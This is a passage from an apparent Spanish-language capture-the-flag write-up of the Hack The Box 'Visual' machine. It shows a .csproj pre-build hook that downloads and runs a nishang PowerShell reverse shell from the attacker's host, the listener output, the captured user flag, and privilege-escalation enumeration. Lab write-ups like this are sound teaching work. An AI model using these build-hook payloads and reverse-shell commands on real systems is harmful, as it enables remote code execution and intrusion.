</span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π superapp master ✗ ❯ git add . </span></span><span class="line"><span class="cl"> π superapp master ✗ ❯ git commit -m <span class="s1">&#39;ping to me&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>master 1b7f5d5<span class="o">]</span> ping to me </span></span><span class="line"><span class="cl"> <span class="m">1</span> file changed, <span class="m">2</span> insertions<span class="o">(</span>+<span class="o">)</span>, <span class="m">2</span> deletions<span class="o">(</span>-<span class="o">)</span> </span></span><span class="line"><span class="cl"> π superapp master ❯ sudo tcpdump -i tun0 icmp </span></span><span class="line"><span class="cl"><span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> kali: </span></span><span class="line"><span class="cl">tcpdump: verbose output suppressed, use -v<span class="o">[</span>v<span class="o">]</span>... <span class="k">for</span> full protocol decode </span></span><span class="line"><span class="cl">listening on tun0, link-type RAW <span class="o">(</span>Raw IP<span class="o">)</span>, snapshot length <span class="m">262144</span> bytes </span></span><span class="line"><span class="cl">21:27:42.323264 IP 10.10.11.234 &gt; kali: ICMP <span class="nb">echo</span> request, id 1, seq 1, length <span class="m">40</span> </span></span><span class="line"><span class="cl">21:27:42.323351 IP kali &gt; 10.10.11.234: ICMP <span class="nb">echo</span> reply, id 1, seq 1, length <span class="m">40</span> </span></span><span class="line"><span class="cl">21:27:43.338332 IP 10.10.11.234 &gt; kali: ICMP <span class="nb">echo</span> request, id 1, seq 2, length <span class="m">40</span> </span></span><span class="line"><span class="cl">21:27:43.338346 IP kali &gt; 10.10.11.234: ICMP <span class="nb">echo</span> reply, id 1, seq 2, length <span class="m">40</span> </span></span><span class="line"><span class="cl">21:27:44.350329 IP 10.10.11.234 &gt; kali: ICMP <span class="nb">echo</span> request, id 1, seq 3, length <span class="m">40</span> </span></span><span class="line"><span class="cl">21:27:44.350344 IP kali &gt; 10.10.11.234: ICMP <span class="nb">echo</span> reply, id 1, seq 3, length <span class="m">40</span> </span></span><span class="line"><span class="cl">21:27:45.356784 IP 10.10.11.234 &gt; kali: ICMP <span class="nb">echo</span> request, id 1, seq 4, length <span class="m">40</span> </span></span><span class="line"><span class="cl">21:27:45.356797 IP kali &gt; 10.10.11.234: ICMP <span class="nb">echo</span> reply, id 1, seq 4, length <span class="m">40</span> </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---enox">User - Enox</h1> <p>Editamos nuevamente agregando la ejecucion de una shell inversa con nishang.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-xml" data-lang="xml"><span class="line"><span class="cl"><span class="nt">&lt;Project</span> <span class="na">Sdk=</span><span class="s">&#34;Microsoft.NET.Sdk&#34;</span><span class="nt">&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;PropertyGroup&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;OutputType&gt;</span>Exe<span class="nt">&lt;/OutputType&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;TargetFramework&gt;</span>net6.0<span class="nt">&lt;/TargetFramework&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;ImplicitUsings&gt;</span>enable<span class="nt">&lt;/ImplicitUsings&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;Nullable&gt;</span>enable<span class="nt">&lt;/Nullable&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;/PropertyGroup&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;Target</span> <span class="na">Name=</span><span class="s">&#34;PreBuild&#34;</span> <span class="na">BeforeTargets=</span><span class="s">&#34;PreBuildEvent&#34;</span><span class="nt">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;Exec</span> <span class="na">Command=</span><span class="s">&#34;powershell.exe -c iex(new-object net.webclient).downloadstring(&#39;http://10.10.15.0/nishang.ps1&#39;)&#34;</span> <span class="nt">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;/Target&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!--&lt;Target Name=&#34;PostBuild&#34; AfterTargets=&#34;PostBuildEvent&#34;&gt; </span></span></span><span class="line"><span class="cl"><span class="c"> &lt;Exec Command=&#34;cmd /c whoami&#34; /&gt; </span></span></span><span class="line"><span class="cl"><span class="c"> &lt;/Target&gt;--&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nt">&lt;/Project&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Al final del archivo nishang.ps1 agregamos nuestra direccion ip y puerto.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/www ❯ tail nishang.ps1 -n <span class="m">1</span> </span></span><span class="line"><span class="cl">Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.0 -Port <span class="m">1335</span> </span></span><span class="line"><span class="cl"> π ~/htb/www ❯ </span></span></code></pre></td></tr></table> </div> </div><p>Luego de unos segundos de enviar nuestro repositorio obtuvimos una shell inversa como enox.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π repo master ✗ ❯ rlwrap nc -lvp <span class="m">1335</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1335</span> ... </span></span><span class="line"><span class="cl">10.10.11.234: inverse host lookup failed: Unknown host </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.15.0<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.234<span class="o">]</span> <span class="m">49677</span> </span></span><span class="line"><span class="cl">Windows PowerShell running as user enox on VISUAL </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> <span class="m">2015</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\6</span>a611821b24c46589efb4bbbb16d08<span class="se">\v</span>isualapp&gt;whoami </span></span><span class="line"><span class="cl">visual<span class="se">\e</span>nox </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\6</span>a611821b24c46589efb4bbbb16d08<span class="se">\v</span>isualapp&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Logrando obtener nuestra flag <code>user.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\e</span>nox&gt; <span class="nb">cd</span> desktop </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\e</span>nox<span class="se">\d</span>esktop&gt; dir </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\u</span>sers<span class="se">\e</span>nox<span class="se">\d</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar--- 10/24/2023 5:29 PM <span class="m">34</span> user.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\e</span>nox<span class="se">\d</span>esktop&gt; cat user.txt </span></span><span class="line"><span class="cl">f7c8abcd62c61e6b417e07d6e1134e5e </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\e</span>nox<span class="se">\d</span>esktop&gt; </span></span></code></pre></td></tr></table> </div> </div><h1 id="privesc">Privesc</h1> <p>Observamos los usuarios, vemos al administrador y enox quienes destacan mas, y los grupos de este ultimo no muestran uno interesante.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\f</span>addcf9f2af0361211fe87c08aadfc<span class="se">\s</span>uperdupperapp&gt; net users </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User accounts <span class="k">for</span> <span class="se">\\</span>VISUAL </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">Administrator DefaultAccount enox </span></span><span class="line"><span class="cl">Guest WDAGUtilityAccount </span></span><span class="line"><span class="cl">The <span class="nb">command</span> completed successfully. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\f</span>addcf9f2af0361211fe87c08aadfc<span class="se">\s</span>uperdupperapp&gt; whoami /groups </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">GROUP INFORMATION </span></span><span class="line"><span class="cl">----------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Group Name Type SID <span class="nv">Attributes</span> </span></span><span class="line"><span class="cl"><span class="o">====================================</span> <span class="o">================</span> <span class="o">============</span> <span class="o">==================================================</span> </span></span><span class="line"><span class="cl">Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">BUILTIN<span class="se">\U</span>sers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">NT AUTHORITY<span class="se">\S</span>ERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">NT AUTHORITY<span class="se">\A</span>uthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">NT AUTHORITY<span class="se">\T</span>his Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">NT AUTHORITY<span class="se">\L</span>ocal account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">NT AUTHORITY<span class="se">\N</span>TLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">Mandatory Label<span class="se">\H</span>igh Mandatory Level Label S-1-16-12288 </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\f</span>addcf9f2af0361211fe87c08aadfc<span class="se">\s</span>uperdupperapp&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Enumeramos los procesos filtrando por enox para verificar si un proceso esta siendo ejecutado como system, no se observa ninguno, el unico que nos llama la atencion es httpd el cual seria el proceso de apache.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\f</span>addcf9f2af0361211fe87c08aadfc<span class="se">\s</span>uperdupperapp&gt; tasklist /v /fi <span class="s2">&#34;username ne enox&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window <span class="nv">Title</span> </span></span><span class="line"><span class="cl"><span class="o">=========================</span> <span class="o">========</span> <span class="o">================</span> <span class="o">===========</span> <span class="o">============</span> <span class="o">===============</span> <span class="o">==================================================</span> <span class="o">============</span> <span class="o">========================================================================</span> </span></span><span class="line"><span class="cl">System Idle Process <span class="m">0</span> <span class="m">0</span> <span class="m">8</span> K Unknown NT AUTHORITY<span class="se">\S</span>YSTEM 8:47:41 N/A </span></span><span class="line"><span class="cl">System <span class="m">4</span> <span class="m">0</span> <span class="m">108</span> K Unknown N/A 0:00:08 N/A </span></span><span class="line"><span class="cl">Registry <span class="m">88</span> <span class="m">0</span> 109,172 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">smss.exe <span class="m">260</span> <span class="m">0</span> 1,192 K Unknown N/A 0:00:00 N/ </span></span><span class="line"><span class="cl"><span class="o">[</span>.. snip..<span class="o">]</span> </span></span><span class="line"><span class="cl">svchost.exe <span class="m">2072</span> <span class="m">0</span> 5,512 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">httpd.exe <span class="m">2100</span> <span class="m">0</span> 21,116 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">svchost.exe <span class="m">2132</span> <span class="m">0</span> 12,580 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">msdtc.exe <span class="m">4348</span> <span class="m">0</span> 10,492 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">svchost.exe <span class="m">492</span> <span class="m">0</span> 12,432 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">svchost.exe <span class="m">1108</span> <span class="m">0</span> 17,000 K Unknown N/A 0:00:05 N/A </span></span><span class="line"><span class="cl">svchost.exe <span class="m">644</span> <span class="m">0</span> 7,804 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">MicrosoftEdgeUpdate.exe <span class="m">5028</span> <span class="m">0</span> 3,864 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">svchost.exe <span class="m">380</span> <span class="m">0</span> 12,980 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">svchost.exe <span class="m">1768</span> <span class="m">0</span> 13,332 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">svchost.exe <span class="m">4428</span> <span class="m">0</span> 21,708 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">svchost.exe <span class="m">3524</span> <span class="m">0</span> 10,312 K Unknown N/A 0:00:00 N/A </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\f</span>addcf9f2af0361211fe87c08aadfc<span class="se">\s</span>uperdupperapp&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Encontramos que es xampp el cual esta ejecutando el sitio web, ademas tenemos permisos de escritura en la carpeta.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; dir </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">d----- 6/10/2023 10:32 AM assets </span></span><span class="line"><span class="cl">d----- 6/10/2023 10:32 AM css </span></span><span class="line"><span class="cl">d----- 6/10/2023 10:32 AM js </span></span><span class="line"><span class="cl">d----- 10/30/2023 6:46 PM uploads </span></span><span class="line"><span class="cl">-a---- 6/10/2023 6:20 PM <span class="m">7534</span> index.php </span></span><span class="line"><span class="cl">-a---- 6/10/2023 4:17 PM <span class="m">1554</span> submit.php </span></span><span class="line"><span class="cl">-a---- 6/10/2023 4:11 PM <span class="m">4970</span> vs_status.php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; icacls . </span></span><span class="line"><span class="cl">. Everyone:<span class="o">(</span>OI<span class="o">)(</span>CI<span class="o">)(</span>F<span class="o">)</span> </span></span><span class="line"><span class="cl"> Everyone:<span class="o">(</span>I<span class="o">)(</span>OI<span class="o">)(</span>CI<span class="o">)(</span>F<span class="o">)</span> </span></span><span class="line"><span class="cl"> NT AUTHORITY<span class="se">\S</span>YSTEM:<span class="o">(</span>I<span class="o">)(</span>OI<span class="o">)(</span>CI<span class="o">)(</span>F<span class="o">)</span> </span></span><span class="line"><span class="cl"> BUILTIN<span class="se">\A</span>dministrators:<span class="o">(</span>I<span class="o">)(</span>OI<span class="o">)(</span>CI<span class="o">)(</span>F<span class="o">)</span> </span></span><span class="line"><span class="cl"> BUILTIN<span class="se">\U</span>sers:<span class="o">(</span>I<span class="o">)(</span>OI<span class="o">)(</span>CI<span class="o">)(</span>RX<span class="o">)</span> </span></span><span class="line"><span class="cl"> BUILTIN<span class="se">\U</span>sers:<span class="o">(</span>I<span class="o">)(</span>CI<span class="o">)(</span>AD<span class="o">)</span> </span></span><span class="line"><span class="cl"> BUILTIN<span class="se">\U</span>sers:<span class="o">(</span>I<span class="o">)(</span>CI<span class="o">)(</span>WD<span class="o">)</span> </span></span><span class="line"><span class="cl"> CREATOR OWNER:<span class="o">(</span>I<span class="o">)(</span>OI<span class="o">)(</span>CI<span class="o">)(</span>IO<span class="o">)(</span>F<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Successfully processed <span class="m">1</span> files<span class="p">;</span> Failed processing <span class="m">0</span> files </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs&gt; </span></span></code></pre></td></tr></table> </div> </div><p>El index.php unicamente contiene HTML, en el caso de vs_status.php &ldquo;verifica&rdquo; el estado de la compilacion.<br /> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> index.php </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="cp">&lt;!DOCTYPE html&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;</span><span class="nt">html</span> <span class="na">lang</span><span class="o">=</span><span class="s">&#34;en&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">head</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">meta</span> <span class="na">charset</span><span class="o">=</span><span class="s">&#34;utf-8&#34;</span> <span class="p">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">meta</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;viewport&#34;</span> <span class="na">content</span><span class="o">=</span><span class="s">&#34;width=device-width, initial-scale=1, shrink-to-fit=no&#34;</span> <span class="p">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">meta</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;description&#34;</span> <span class="na">content</span><span class="o">=</span><span class="s">&#34;&#34;</span> <span class="p">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">meta</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;author&#34;</span> <span class="na">content</span><span class="o">=</span><span class="s">&#34;&#34;</span> <span class="p">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">title</span><span class="p">&gt;</span>Visual - Revolutionizing Visual Studio Builds<span class="p">&lt;/</span><span class="nt">title</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!-- Favicon--&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">link</span> <span class="na">rel</span><span class="o">=</span><span class="s">&#34;icon&#34;</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;image/x-icon&#34;</span> <span class="na">href</span><span class="o">=</span><span class="s">&#34;assets/favicon.ico&#34;</span> <span class="p">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!-- Bootstrap icons--&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">link</span> <span class="na">href</span><span class="o">=</span><span class="s">&#34;https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css&#34;</span> <span class="na">rel</span><span class="o">=</span><span class="s">&#34;stylesheet&#34;</span> <span class="p">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!-- Core theme CSS (includes Bootstrap)--&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">link</span> <span class="na">href</span><span class="o">=</span><span class="s">&#34;css/styles.css&#34;</span> <span class="na">rel</span><span class="o">=</span><span class="s">&#34;stylesheet&#34;</span> <span class="p">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">head</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="c">&lt;!-- Responsive navbar--&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">nav</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;navbar navbar-expand-lg navbar-dark bg-dark&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;container px-lg-5&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">a</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;navbar-brand&#34;</span> <span class="na">href</span><span class="o">=</span><span class="s">&#34;#!&#34;</span><span class="p">&gt;</span>Visual<span 